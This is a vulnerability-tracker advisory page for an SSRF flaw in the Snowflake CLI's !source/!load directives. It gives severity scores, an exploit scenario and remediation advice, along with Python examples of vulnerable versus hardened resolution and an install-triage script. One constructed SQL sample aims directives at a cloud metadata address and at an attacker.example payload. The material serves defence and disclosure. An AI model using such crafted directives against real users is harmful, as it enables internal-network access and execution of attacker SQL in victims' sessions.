
Snowflake CLI CVE-2026-13751

EUVD EUVD-2026-40147 CRITICAL
Inclusion of Functionality from Untrusted Control Sphere (CWE-829)
2026-06-29 412d305a-227d-44f9-a262-a31ba44f2aea GHSA-6xpv-fwh6-29jc
Critical
Disputed · 9.6 NVD

Severity by source

Sources disagree (Medium to Critical)

Vendor (412d305a-227d-44f9-a262-a31ba44f2aea), primary source: MEDIUM (qualitative)
NVD: 9.6 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
vuln.today AI: 9.6 CRITICAL

Attacker-supplied input reaches the SQL reader with no authentication gate (PR:N), but the victim has to run the crafted SQL (UI:R); SSRF plus SQL execution in the victim's session context crosses a scope boundary (S:C) with high confidentiality and integrity impact, while the availability impact is limited (A:L).

CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L
CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N

vuln.today treats the vendor's rating as authoritative for the headline severity. A higher third-party CVSS (here NVD's 9.6; on other entries, CISA-ADP) is shown for transparency but does not drive the headline.

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline (7 events)

Jun 30, 2026 16:28  vuln.today  Analysis Updated, v3 (cvss_changed)
Jun 30, 2026 16:28  vuln.today  Analysis Updated, v2 (cvss_changed)
Jun 30, 2026 16:22  vuln.today  Re-analysis Queued (cvss_changed)
Jun 30, 2026 16:22  NVD         Severity Changed: MEDIUM -> CRITICAL
Jun 30, 2026 16:22  NVD         CVSS changed: 4.1 (MEDIUM) -> 9.6 (CRITICAL)
Jun 29, 2026 19:01  EUVD        Patch available
Jun 29, 2026 17:33  vuln.today  Analysis Generated

Description (NVD)

Improper handling of untrusted remote references in Snowflake CLI versions prior to 3.19 allowed server-side request forgery. The SQL statement reader's !source/!load directives could reference remote URLs that were retrieved at runtime without sufficient restriction on the request destination. By supplying crafted SQL content processed through a vulnerable command path, an attacker could cause the victim's environment to issue unintended outbound requests to internal or otherwise non-public network locations, and could cause remote SQL content to be retrieved and executed in the context of the victim user's session. Successful exploitation requires the victim to process attacker-controlled content through a vulnerable command path and is limited by the privileges available to that session and environment. The fix is available in Snowflake CLI version 3.19, which adds an option to disable remote URL retrieval.

Analysis (AI)

Server-side request forgery in Snowflake CLI versions 3.6.0 through 3.18.x lets an attacker coerce a victim's CLI session into fetching attacker-chosen remote URLs and then retrieving and executing remote SQL in that session's context. The flaw lives in the SQL statement reader's !source/!load directives, which resolve remote references at runtime without restricting the request destination, so a victim who processes attacker-supplied SQL can be made to reach internal/non-public network locations. …
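The description and analysis above both come down to one missing check: a directive target that is a URL gets fetched, whatever host it names, and the body comes back as SQL to run in the session. The following is an added example, not Snowflake CLI's own code, of a toy statement reader that shows that unrestricted resolution beside a hardened one. The directive form (`!source <target>` / `!load <target>` on its own line), the `allow_remote` switch standing in for the disable option the advisory mentions, the link-local and attacker hosts, and the canned HTTP and DNS responses are all assumptions or constructed data so the block runs offline.

```python
"""Toy SQL statement reader: unrestricted !source/!load resolution as the
advisory describes it, next to a hardened version. Added example, not
Snowflake CLI code; directive syntax, allow_remote and all inputs are
assumptions or constructed data."""
import ipaddress
import re
from urllib.parse import urlparse

# Assumed directive form: "!source <target>" / "!load <target>" on its own line.
DIRECTIVE_RE = re.compile(r"^\s*!(source|load)\s+(\S+)\s*$", re.IGNORECASE)
REMOTE_SCHEMES = ("http", "https")

# Constructed script of the kind an attacker would slip into a repo or a
# "helpful" setup file: one directive aims at a link-local metadata address,
# one at an attacker host, one at a local file.
SAMPLE_SQL = """\
-- constructed setup script
CREATE TABLE IF NOT EXISTS t (id INT);
!source http://169.254.169.254/latest/meta-data/
!load https://attacker.example/payload.sql
!source ./local_helpers.sql
SELECT 1;
"""


class RemoteReferenceBlocked(Exception):
    """Raised by the hardened resolver for a directive it refuses to follow."""


def parse_directives(sql_text):
    """Return (line_no, directive, target) for every !source/!load line."""
    found = []
    for n, line in enumerate(sql_text.splitlines(), 1):
        m = DIRECTIVE_RE.match(line)
        if m:
            found.append((n, m.group(1).lower(), m.group(2)))
    return found


def is_remote(target):
    return urlparse(target).scheme in REMOTE_SCHEMES


def resolve_vulnerable(target, fetch, read_local):
    """Shape of the pre-3.19 behaviour: a remote target is fetched as given,
    with no check on where the request goes; the body is then run as SQL."""
    if is_remote(target):
        return fetch(target)
    return read_local(target)


def destination_is_nonpublic(hostname, resolve):
    """True if any resolved address is loopback, link-local, private or
    otherwise non-global, or if the name does not resolve (fail closed)."""
    try:
        addrs = resolve(hostname)
    except OSError:
        return True
    return any(not ipaddress.ip_address(a).is_global for a in addrs)


def resolve_hardened(target, fetch, read_local, resolve, allow_remote=False):
    """Deny remote retrieval unless explicitly enabled, and even then refuse
    non-public destinations. allow_remote is an assumed stand-in for the
    disable option the advisory attributes to 3.19."""
    if not is_remote(target):
        return read_local(target)
    if not allow_remote:
        raise RemoteReferenceBlocked(f"remote reference refused: {target}")
    host = urlparse(target).hostname or ""
    if destination_is_nonpublic(host, resolve):
        raise RemoteReferenceBlocked(f"non-public destination refused: {target}")
    return fetch(target)


def run_script(sql_text, resolver, **kw):
    """Resolve each directive; return (line_no, outcome, detail) per directive."""
    out = []
    for n, _directive, target in parse_directives(sql_text):
        try:
            out.append((n, "fetched", resolver(target, **kw)))
        except RemoteReferenceBlocked as exc:
            out.append((n, "blocked", str(exc)))
    return out


# Offline stand-ins (constructed): canned HTTP bodies and a fixed DNS table.
FAKE_HTTP = {
    "http://169.254.169.254/latest/meta-data/": "iam/\ninstance-id\n",
    "https://attacker.example/payload.sql": "-- attacker SQL\nSELECT 'owned';",
}
FAKE_DNS = {"169.254.169.254": ["169.254.169.254"],
            "attacker.example": ["93.184.216.34"]}  # constructed public address


def fake_fetch(url):
    return FAKE_HTTP[url]


def fake_read_local(path):
    return f"-- local file {path}"


def fake_resolve(host):
    if host not in FAKE_DNS:
        raise OSError("NXDOMAIN")
    return FAKE_DNS[host]
```

Running `run_script(SAMPLE_SQL, resolve_vulnerable, ...)` fetches all three targets, including the metadata address, and hands the attacker's body back as SQL. `resolve_hardened` with the default `allow_remote=False` refuses both URLs and only reads the local file; with `allow_remote=True` it still refuses the link-local destination because the resolved address is non-global. The resolver checks the address the name resolves to, not the hostname string, which is what keeps a DNS name pointing at internal space from slipping past.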


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata:

Access: craft SQL containing a !source/!load directive that points at a remote URL
Delivery: deliver the script into the victim's workflow
Exploit: victim runs the script in a vulnerable CLI
Execution: CLI fetches the attacker-chosen or internal URL (SSRF)
Persist: remote SQL is executed in the victim's session
Impact: internal network access or data impact

Vulnerability Assessment (AI)

Exploitation: Exploitation requires the victim to process attacker-controlled SQL content through a vulnerable command path that invokes the SQL statement reader's !source or !load directives, and requires the running Snowflake CLI to be between 3.6.0 and 3.18.x, where remote URL retrieval is always on (the option to disable it only arrives in 3.19.0). … Additional conditions and limiting factors are described in the full assessment.

Risk Assessment: Signals conflict and must be weighed rather than read off the 9.6 alone. …

Exploit Scenario: An attacker delivers a SQL file (for example via a shared repo, a support ticket, or a "helpful" setup script) containing a !source or !load directive pointing at an attacker-controlled or internal URL. When the victim runs that script through a pre-3.19 Snowflake CLI, the CLI fetches the remote content, reaching internal systems on the victim's behalf and executing the returned SQL in the victim's authenticated session. …

Remediation: Upgrade to the fixed release. Vendor-released patch: Snowflake CLI version 3.19.0, which introduces an option to disable remote URL retrieval; this is the primary and recommended fix. Because the description frames the fix as an option rather than a change of default, confirm after upgrading that remote retrieval is actually disabled in your configuration instead of assuming the upgrade alone changes behaviour. …

Recommended Action (AI)

24 hours: Identify and catalog all Snowflake CLI installations across development, CI/CD, and production systems; determine which are running versions 3.6.0 through 3.18.x. …
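The inventory step above is mostly bookkeeping, but two parts of it are worth scripting: deciding whether a reported version falls in the affected range, and finding which SQL scripts in a repo or CI pipeline would actually trigger remote retrieval on a pre-3.19 install (those are the scripts to review or quarantine until the upgrade lands). The following is an added example, not Snowflake CLI tooling; the wording of the version output, the directive syntax and the inventory data are assumptions or constructed. It also handles one wrinkle the page itself raises: the NVD description says "prior to 3.19" while the analysis gives 3.6.0 as the lower bound, so a build older than 3.6.0 is routed to manual review rather than dismissed.

```python
"""First-day triage for the recommended action: flag Snowflake CLI installs in
the affected range and find SQL scripts that would trigger remote retrieval on
such an install. Added example, not Snowflake CLI tooling; version-output
wording and directive syntax are assumptions, inputs are constructed."""
import re
from urllib.parse import urlparse

AFFECTED_MIN = (3, 6, 0)   # lower bound given in the page's analysis
FIXED = (3, 19, 0)         # first fixed release
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")
# Assumed directive form: "!source <target>" / "!load <target>".
DIRECTIVE_RE = re.compile(r"^\s*!(source|load)\s+(\S+)", re.IGNORECASE)


def parse_version(text):
    """First x.y.z triple in whatever the CLI's version command printed
    (exact wording assumed). None if no version is present."""
    m = VERSION_RE.search(text)
    return tuple(int(g) for g in m.groups()) if m else None


def classify(version_text):
    """'affected', 'fixed', 'older-than-range' or 'unknown'."""
    v = parse_version(version_text)
    if v is None:
        return "unknown"
    if v >= FIXED:
        return "fixed"
    if v >= AFFECTED_MIN:
        return "affected"
    # NVD says "prior to 3.19" while the analysis starts at 3.6.0, so an
    # older build is not safely dismissed: send it for a manual look.
    return "older-than-range"


def remote_directives(sql_text):
    """(line_no, directive, url) for each !source/!load aimed at an http(s) URL."""
    hits = []
    for n, line in enumerate(sql_text.splitlines(), 1):
        m = DIRECTIVE_RE.match(line)
        if m and urlparse(m.group(2)).scheme in ("http", "https"):
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits


def triage(hosts, scripts):
    """hosts: {host: version output}; scripts: {path: sql text}.
    Returns hosts that need the 3.19.0 upgrade, hosts that need a manual look,
    and scripts that would reach out to the network on a pre-3.19 CLI."""
    upgrade, review = [], []
    for host, output in sorted(hosts.items()):
        verdict = classify(output)
        if verdict == "affected":
            upgrade.append(host)
        elif verdict in ("unknown", "older-than-range"):
            review.append(host)
    remote_refs = {}
    for path, sql in sorted(scripts.items()):
        hits = remote_directives(sql)
        if hits:
            remote_refs[path] = hits
    return {"upgrade": upgrade, "review": review, "remote_refs": remote_refs}


# Constructed inventory: version output as collected from each host.
HOSTS = {
    "ci-runner-01": "Snowflake CLI version: 3.12.4",
    "dev-laptop-7": "Snowflake CLI version: 3.19.0",
    "legacy-box": "Snowflake CLI version: 3.5.1",
    "bastion": "sh: snow: command not found",
}

# Constructed scripts as a CI job might feed them to the CLI.
SCRIPTS = {
    "deploy/setup.sql": "CREATE DATABASE IF NOT EXISTS app;\n"
                        "!source https://intranet.corp/shared/init.sql\n",
    "deploy/local.sql": "!source ./helpers.sql\nSELECT 1;\n",
}
```

`triage(HOSTS, SCRIPTS)` puts `ci-runner-01` on the upgrade list, sends `bastion` (no parsable version) and `legacy-box` (below the analysis's lower bound) to review, and reports `deploy/setup.sql` line 2 as the one script that would make a vulnerable CLI reach out to `intranet.corp`. The scan only catches directives spelled the assumed way; anything the real reader accepts beyond that would need its own pattern.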


CVE-2026-13751 vulnerability details – vuln.today
